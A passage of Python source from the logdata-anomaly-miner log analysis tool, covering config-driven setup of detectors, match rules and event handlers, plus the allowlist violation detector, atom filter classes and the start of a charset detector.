b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b")) elif item['type'].name == 'NewMatchPathDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline']) elif 'MatchAction' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if item['type'].name == 'EventGenerationMatchAction': tmp_analyser = func(item['event_type'], item['event_message'], anomaly_event_handlers) elif item['type'].name == 'AtomFilterMatchAction': if 'subhandler_list' in item: tmp_analyser = func([analysis_context.get_component_by_name(component) for component in item['subhandler_list']], stop_when_handled_flag=item['stop_when_handled_flag']) if item['delete_components']: for component_name in item['subhandler_list']: component = analysis_context.get_component_by_name(component_name) for i, val in enumerate(atom_filter.subhandler_list): if val[0] == component: del atom_filter.subhandler_list[i] break else: tmp_analyser = func([handler for handler, stop_when_handled_flag in atom_filter.subhandler_list], stop_when_handled_flag=item['stop_when_handled_flag']) match_action_dict[comp_name] = tmp_analyser continue elif 'MatchRule' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = None if item['match_action'] is not None: if item['match_action'] not in match_action_dict: msg = f'The match action {item["match_action"]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = match_action_dict[item['match_action']] if item['type'].name in ('AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'): sub_rules = [] for sub_rule in item['sub_rules']: if sub_rule not in match_rules_dict: msg = f'The sub match rule {sub_rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rules.append(match_rules_dict[sub_rule]) tmp_analyser = func(sub_rules, match_action=match_action) if item['type'].name == 'ValueDependentDelegatedMatchRule': rule_lookup_dict = {} for key, rule in item['rule_lookup_dict'].items(): if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) rule_lookup_dict[ast.literal_eval(key)] = match_rules_dict[rule] tmp_analyser = func( item['paths'], rule_lookup_dict, default_rule=item['default_rule'], match_action=match_action) if item['type'].name == 'NegationMatchRule': if item['sub_rule'] not in match_rules_dict: msg = f'The match rule {item["sub_rule"]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rule = match_rules_dict[item['sub_rule']] tmp_analyser = func(sub_rule, match_action=match_action) if item['type'].name in ('PathExistsMatchRule', 'IPv4InRFC1918MatchRule'): tmp_analyser = func(item['path'], match_action=match_action) if item['type'].name == 'ValueMatchRule': if isinstance(item['value'], str): item['value'] = item['value'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") tmp_analyser = func(item['path'], item['value'], match_action=match_action) if item['type'].name == 'ValueListMatchRule': value_list = [] for val in item['value_list']: if isinstance(val, str): val = val.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") value_list.append(val) tmp_analyser = func(item['path'], value_list, match_action=match_action) if item['type'].name == 'ValueRangeMatchRule': tmp_analyser = func(item['path'], item['lower_limit'], item['upper_limit'], match_action) if item['type'].name == 'StringRegexMatchRule': import re tmp_analyser = func(item['path'], re.compile(item['regex'].encode()), match_action=match_action) if item['type'].name == 'ModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. tmp_analyser = func(item['path'], item['seconds_modulo'], item['lower_limit'], item['upper_limit'], match_action=match_action) if item['type'].name == 'ValueDependentModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. 
limit_lookup_dict = {} for key in item['limit_lookup_dict'].keys(): if isinstance(key, str): limit_lookup_dict[key.encode()] = item['limit_lookup_dict'][key] else: limit_lookup_dict[key] = item['limit_lookup_dict'][key] tmp_analyser = func(item['path'], item['seconds_modulo'], item['paths'], limit_lookup_dict, default_limit=item['default_limit'], match_action=match_action) if item['type'].name == 'DebugMatchRule': tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) if item['type'].name == 'DebugHistoryMatchRule': # object_history is not supported yet.. tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) match_rules_dict[comp_name] = tmp_analyser continue elif item['type'].name == 'CorrelationRule': artefact_match_parameters = [] for match_parameters in item['artefact_match_parameters']: artefact_match_parameters.append(tuple(i for i in match_parameters)) tmp_analyser = func(item['rule_id'], item['min_time_delta'], item['max_time_delta'], artefact_match_parameters=artefact_match_parameters) correlation_rules[item['rule_id']] = tmp_analyser continue elif item['type'].name == 'EventClassSelector': if item['artefact_a_rules'] is None and item['artefact_b_rules'] is None: msg = 'At least one of the EventClassSelector\'s rules must not be None!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules = None artefact_b_rules = None if item['artefact_a_rules'] is not None: artefact_a_rules = [] for rule in item['artefact_a_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules.append(correlation_rules[rule]) if item['artefact_b_rules'] is not None: artefact_b_rules = [] for rule in item['artefact_b_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_b_rules.append(correlation_rules[rule]) tmp_analyser = func(item['action_id'], artefact_a_rules, artefact_b_rules) match_action_dict[item['action_id']] = tmp_analyser continue elif item['type'].name == 'TimeCorrelationViolationDetector': ruleset = [] for rule in item['ruleset']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) ruleset.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, ruleset, anomaly_event_handlers, persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'TimestampsUnsortedDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, exit_on_error_flag=item['exit_on_error_flag'], output_logline=item['output_logline']) elif item['type'].name == 'AllowlistViolationDetector': allowlist_rules = [] for rule in item['allowlist_rules']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) allowlist_rules.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=item['output_logline']) elif item['type'].name == 'EventTypeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], id_path_list=item['id_path_list'], allow_missing_id=item['allow_missing_id'], allowed_id_tuples=item['allowed_id_tuples'], min_num_vals=item['min_num_vals'], max_num_vals=item['max_num_vals'], save_values=item['save_values']) elif item['type'].name == 'VariableTypeDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], gof_alpha=item['gof_alpha'], s_gof_alpha=item['s_gof_alpha'], s_gof_bt_alpha=item['s_gof_bt_alpha'], d_alpha=item['d_alpha'], d_bt_alpha=item['d_bt_alpha'], div_thres=item['div_thres'], sim_thres=item['sim_thres'], indicator_thres=item['indicator_thres'], num_init=item['num_init'], num_update=item['num_update'], num_update_unq=item['num_update_unq'], num_s_gof_values=item['num_s_gof_values'], num_s_gof_bt=item['num_s_gof_bt'], num_d_bt=item['num_d_bt'], num_pause_discrete=item['num_pause_discrete'], num_pause_others=item['num_pause_others'], test_gof_int=item['test_gof_int'], num_stop_update=item['num_stop_update'], silence_output_without_confidence=item['silence_output_without_confidence'], silence_output_except_indicator=item['silence_output_except_indicator'], num_var_type_hist_ref=item['num_var_type_hist_ref'], 
num_update_var_type_hist_ref=item['num_update_var_type_hist_ref'], num_var_type_considered_ind=item['num_var_type_considered_ind'], num_stat_stop_update=item['num_stat_stop_update'], num_updates_until_var_reduction=item['num_updates_until_var_reduction'], var_reduction_thres=item['var_reduction_thres'], num_skipped_ind_for_weights=item['num_skipped_ind_for_weights'], num_ind_for_weights=item['num_ind_for_weights'], used_multinomial_test=item['used_multinomial_test'], use_empiric_distr=item['use_empiric_distr'], used_range_test=item['used_range_test'], range_alpha=item['range_alpha'], range_threshold=item['range_threshold'], range_limits_factor=item['range_limits_factor'], num_reinit_range=item['num_reinit_range'], dw_alpha=item['dw_alpha'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn) elif item['type'].name == 'VariableCorrelationDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], num_init=item['num_init'], num_update=item['num_update'], disc_div_thres=item['disc_div_thres'], num_steps_create_new_rules=item['num_steps_create_new_rules'], num_upd_until_validation=item['num_upd_until_validation'], num_end_learning_phase=item['num_end_learning_phase'], check_cor_thres=item['check_cor_thres'], check_cor_prob_thres=item['check_cor_prob_thres'], check_cor_num_thres=item['check_cor_num_thres'], min_values_cors_thres=item['min_values_cors_thres'], new_vals_alarm_thres=item['new_vals_alarm_thres'], num_bt=item['num_bt'], alpha_bt=item['alpha_bt'], used_homogeneity_test=item['used_homogeneity_test'], alpha_chisquare_test=item['alpha_chisquare_test'], max_dist_rule_distr=item['max_dist_rule_distr'], used_presel_meth=item['used_presel_meth'], intersect_presel_meth=item['intersect_presel_meth'], percentage_random_cors=item['percentage_random_cors'], match_disc_vals_sim_tresh=item['match_disc_vals_sim_tresh'], exclude_due_distr_lower_limit=item['exclude_due_distr_lower_limit'], match_disc_distr_threshold=item['match_disc_distr_threshold'], used_cor_meth=item['used_cor_meth'], used_validate_cor_meth=item['used_validate_cor_meth'], validate_cor_cover_vals_thres=item['validate_cor_cover_vals_thres'], validate_cor_distinct_thres=item['validate_cor_distinct_thres'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn) elif item['type'].name == 'PathValueTimeIntervalDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], ignore_list=item['ignore_list'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], time_period_length=item['time_period_length'], 
max_time_diff=item['max_time_diff'], num_reduce_time_list=item['num_reduce_time_list'], learn_mode=learn) elif item['type'].name == 'PathArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], output_logline=item['output_logline'], learn_mode=learn, num_init=item['num_init'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], alpha=item['alpha'], alpha_bt=item['alpha_bt'], num_results_bt=item['num_results_bt'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_periods_tsa_ini=item['num_periods_tsa_ini']) elif item['type'].name == 'TSAArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], waiting_time=item['waiting_time'], num_sections_waiting_time=item['num_sections_waiting_time'], target_path_list=item['paths'], acf_pause_interval_percentage=item['acf_pause_interval_percentage'], acf_auto_pause_interval=item['acf_auto_pause_interval'], acf_auto_pause_interval_num_min=item['acf_auto_pause_interval_num_min'], build_sum_over_values=item['build_sum_over_values'], num_periods_tsa_ini=item['num_periods_tsa_ini'], num_division_time_step=item['num_division_time_step'], alpha=item['alpha'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_results_bt=item['num_results_bt'], alpha_bt=item['alpha_bt'], acf_threshold=item['acf_threshold'], round_time_interval_threshold=item['round_time_interval_threshold'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], min_log_lines_per_time_step=item['min_log_lines_per_time_step'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], learn_mode=learn) elif item['type'].name == 'MinimalTransitionTimeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], target_path_list=item['paths'], id_path_list=item['id_path_list'], ignore_list=item['ignore_list'], allow_missing_id=item['allow_missing_id'], num_log_lines_solidify_matrix=item['num_log_lines_solidify_matrix'], time_output_threshold=item['time_output_threshold'], anomaly_threshold=item['anomaly_threshold']) elif item["type"].name in ("VerboseUnparsedAtomHandler", "SimpleUnparsedAtomHandler"): has_unparsed_handler = True stop_when_handled_flag = True if item["type"].name == "VerboseUnparsedAtomHandler": tmp_analyser = 
func(anomaly_event_handlers, parsing_model) else: tmp_analyser = func(anomaly_event_handlers) analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.subhandler_list[0] = (tmp_analyser, stop_when_handled_flag) continue else: tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn) if item['output_event_handlers'] is not None: tmp_analyser.output_event_handlers = item['output_event_handlers'] analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.add_handler(tmp_analyser, stop_when_handled_flag=stop_when_handled_flag) add_default_analysis_components( analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model) def add_default_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model): """Add the default unparsed atom handler and/or NewMatchPathDetector if none is configured.""" if not has_unparsed_handler: from aminer.analysis.UnparsedAtomHandlers import VerboseUnparsedAtomHandler atom_filter.add_handler(VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model), stop_when_handled_flag=True) has_unparsed_handler = True if not has_new_match_path_handler: has_new_match_path_handler = True if 'LearnMode' in yaml_data: learn = yaml_data['LearnMode'] else: learn = True from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector nmpd = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=learn) nmpd.output_event_handlers = None analysis_context.register_component(nmpd, component_name='DefaultNewMatchPathDetector') atom_filter.add_handler(nmpd) return has_new_match_path_handler, has_unparsed_handler def build_event_handlers(analysis_context, anomaly_event_handlers): """Build the event handlers.""" import os import stat try: event_handler_id_list = [] if 'EventHandlers' 
in yaml_data and yaml_data['EventHandlers'] is not None: for item in yaml_data['EventHandlers']: if item['id'] in event_handler_id_list: raise ValueError(f'Config-Error: The id "{item["id"]}" occurred multiple times in EventHandlers!') event_handler_id_list.append(item['id']) func = item['type'].func ctx = None if item['type'].name == 'StreamPrinterEventHandler': if 'output_file_path' in item: try: mode = 'w+' if os.path.exists(item['output_file_path']) and stat.S_ISFIFO(os.stat(item['output_file_path']).st_mode): mode = 'w' stream = open(item['output_file_path'], mode) ctx = func(analysis_context, stream) except OSError as e: msg = f'Error occured when opening stream to output_file_path {item["output_file_path"]}. Error: {e}' logging.getLogger(DEBUG_LOG_NAME).error(msg) print(msg, file=sys.stderr) else: ctx = func(analysis_context) if item['type'].name == 'DefaultMailNotificationEventHandler': ctx = func(analysis_context) if item['type'].name == 'SyslogWriterEventHandler': ctx = func(analysis_context, item['instance_name']) if item['type'].name == 'KafkaEventHandler': import configparser config = configparser.ConfigParser() if os.access(item['cfgfile'], os.R_OK): config.read(item['cfgfile']) else: msg = f'{item["cfgfile"]} does not exist or is not readable' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) options = dict(config.items("DEFAULT")) for key, val in options.items(): try: if key == "sasl_plain_username": continue options[key] = int(val) except ValueError: # skipcq: FLK-E722 pass ctx = func(analysis_context, item['topic'], options) if item['type'].name == 'ZmqEventHandler': # if topic is "None" zmq will send messages without using any topic if 'topic' not in item: item['topic'] = None ctx = func(analysis_context, item['topic'], item['url']) if ctx is None: ctx = func(analysis_context) if item['json'] is True or item['type'].name == 'KafkaEventHandler' or item['type'].name == 'ZmqEventHandler': from aminer.events.JsonConverterHandler 
import JsonConverterHandler if item['pretty'] is True: ctx = JsonConverterHandler([ctx], analysis_context, pretty_print=True) else: ctx = JsonConverterHandler([ctx], analysis_context, pretty_print=False) if item['score']: from aminer.events.ScoringEventHandler import ScoringEventHandler ctx = ScoringEventHandler([ctx], analysis_context, weights=item['weights'], auto_weights=item['auto_weights'], auto_weights_history_length=item['auto_weights_history_length']) anomaly_event_handlers.append(ctx) return event_handler_id_list raise KeyError() except KeyError: # Add stdout stream printing for debugging, tuning. from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context, stream=sys.stderr)) return None def tuple_transformation_function_demo_print_every_10th_value(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector_reference.known_values_dict.get(tuple(match_value_list), None) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector_reference.learn_mode = False else: enhanced_new_match_path_value_combo_detector_reference.learn_mode = True return match_value_list def parse_json_yaml(json_dict, parser_model_dict): """Parse an yaml configuration for json.""" key_parser_dict = {} for key in json_dict.keys(): value = json_dict[key] if key is None: key = 'null' if key is False: key = 'false' if key is True: key = 'true' if isinstance(value, dict): key_parser_dict[key] = parse_json_yaml(value, parser_model_dict) elif isinstance(value, list): key_parser_dict[key] = [] for val in value: if isinstance(val, dict): key_parser_dict[key].append(parse_json_yaml(val, parser_model_dict)) elif val in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"): if len(value) > 1 and val == "ALLOW_ALL": msg = "ALLOW_ALL must 
not be combined with other parsers in lists." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) key_parser_dict[key] = value elif parser_model_dict.get(val) is None: msg = f'The parser model {val} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) else: key_parser_dict[key].append(parser_model_dict.get(val)) elif value in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"): key_parser_dict[key] = value elif parser_model_dict.get(value) is None: msg = f'The parser model {value} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) else: key_parser_dict[key] = parser_model_dict.get(value) return key_parser_dict logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/__init__.py000066400000000000000000000000001437606560100313060ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/000077500000000000000000000000001437606560100310325ustar00rootroot00000000000000AllowlistViolationDetector.py000066400000000000000000000065531437606560100366670ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for log atoms not matching any allowlisted rule. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class AllowlistViolationDetector(AtomHandlerInterface): """ Objects of this class handle a list of allowlist rules. They ensure, that each received log-atom is at least covered by a single allowlist rule. To avoid traversing the complete rule tree more than once, the allowlist rules may have match actions attached that set off an alarm by themselves. """ def __init__(self, aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True): """ Initialize the detector. @param allowlist_rules list of rules executed until the first rule matches. """ super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, output_logline=output_logline, allowlist_rules=allowlist_rules) def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. @param log_atom atom with parsed data to check @return a boolean value if the log atom matches one of the rules. 
""" self.log_total += 1 event_data = {} for rule in self.allowlist_rules: if rule.match(log_atom): self.log_success += 1 return True original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary()), 'AffectedLogAtomValues': [data]} sorted_log_lines = [original_log_line_prefix + data] event_data['AnalysisComponent'] = analysis_component for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'No allowlisting for current atom', sorted_log_lines, event_data, log_atom, self) return False def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ super().log_statistics(component_name) for i, rule in enumerate(self.allowlist_rules): rule.log_statistics(component_name + '.' + rule.__class__.__name__ + str(i)) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/AtomFilters.py000066400000000000000000000130621437606560100336370ustar00rootroot00000000000000""" This file collects various classes useful to filter log atoms and pass them to different handlers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface class SubhandlerFilter(AtomHandlerInterface): """Handlers of this class pass the received atoms to a list of atom handlers.""" def __init__(self, subhandler_list, stop_when_handled_flag=False): """ @param subhandler_list a list of objects implementing the AtomHandlerInterface which are run until the end, if stop_when_handled_flag is False or until an atom handler can handle the log atom. @param stop_when_handled_flag True, if the atom handler processing should stop after successfully receiving the log atom. """ super().__init__( mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag) def add_handler(self, atom_handler, stop_when_handled_flag=False): """ Add a handler to the list of handlers. @param atom_handler an object implementing the AtomHandlerInterface. @param stop_when_handled_flag True, if the atom handler processing should stop after successfully receiving the log atom. """ self.subhandler_list.append((atom_handler, stop_when_handled_flag)) def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. @return False when no subhandler was able to handle the atom. """ result = False self.log_total += 1 for handler, stop_when_handled_flag in self.subhandler_list: handler_result = handler.receive_atom(log_atom) if handler_result is True: result = True self.log_success += 1 if stop_when_handled_flag: break return result class MatchPathFilter(AtomHandlerInterface): """This class just splits incoming matches according to existence of paths in the match.""" def __init__(self, parsed_atom_handler_lookup_list, default_parsed_atom_handler=None): """ Initialize the filter. @param parsed_atom_handler_lookup_list contains tuples with search path string and handler. 
When the handler is None, the filter will just drop a received atom without forwarding. @param default_parsed_atom_handler invoke this handler when no handler was found for given match path or do not invoke any handler when None. """ super().__init__( parsed_atom_handler_lookup_list=parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler) def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. @return False when log_atom did not contain match data or was not forwarded to any handler, True otherwise. """ self.log_total += 1 if log_atom.parser_match is None: return False match_dict = log_atom.parser_match.get_match_dictionary() for path_name, target_handler in self.parsed_atom_handler_lookup_list: if path_name in match_dict: if target_handler is not None: target_handler.receive_atom(log_atom) self.log_success += 1 return True if self.default_parsed_atom_handler is None: return False self.default_parsed_atom_handler.receive_atom(log_atom) self.log_success += 1 return True class MatchValueFilter(AtomHandlerInterface): """This class just splits incoming matches using a given match value and forward them to different handlers.""" def __init__(self, target_path, parsed_atom_handler_dict, default_parsed_atom_handler=None): """ Initialize the splitter. @param target_path the path to be analyzed in the parser match of the log atom. @param parsed_atom_handler_dict a dictionary of match value to atom handler. @param default_parsed_atom_handler invoke this default handler when no value handler was found or do not invoke any handler when None. 
""" super().__init__(target_path=target_path, parsed_atom_handler_dict=parsed_atom_handler_dict, default_parsed_atom_handler=default_parsed_atom_handler) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 if log_atom.parser_match is None: return False target_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if target_value is not None: target_value = target_value.match_object target_handler = self.parsed_atom_handler_dict.get(target_value, self.default_parsed_atom_handler) if target_handler is None: return False target_handler.receive_atom(log_atom) self.log_success += 1 return True CharsetDetector.py000066400000000000000000000304731437606560100344170ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for value character sets. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import os import logging import time from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, KEY_PERSISTENCE_PERIOD,\ DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class CharsetDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when numeric values are outside learned intervals.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list, target_path_list=None, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list specifies group identifiers for which data should be learned/analyzed. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param persistence_id name of persistence file. @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. 
@param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, learn_mode=learn_mode, id_path_list=id_path_list, persistence_id=persistence_id, stop_learning_time=stop_learning_time, output_logline=output_logline, ignore_list=ignore_list, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, target_path_list=target_path_list, constraint_list=constraint_list ) # Persisted data stores characters as bytes for each id, i.e., [[[], []], ...]] self.charsets = {} self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for lst in persistence_data: self.charsets[tuple(lst[0])] = set(lst[1]) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. 
all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 or \ len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return # Store all values from target paths in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if value is not None: all_values_none = False values.append(value) if all_values_none is True: return # Store all values from id paths in a list. Use empty list as default path if not applicable. id_vals = [] for path in self.id_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) id_vals.append(value) id_event = 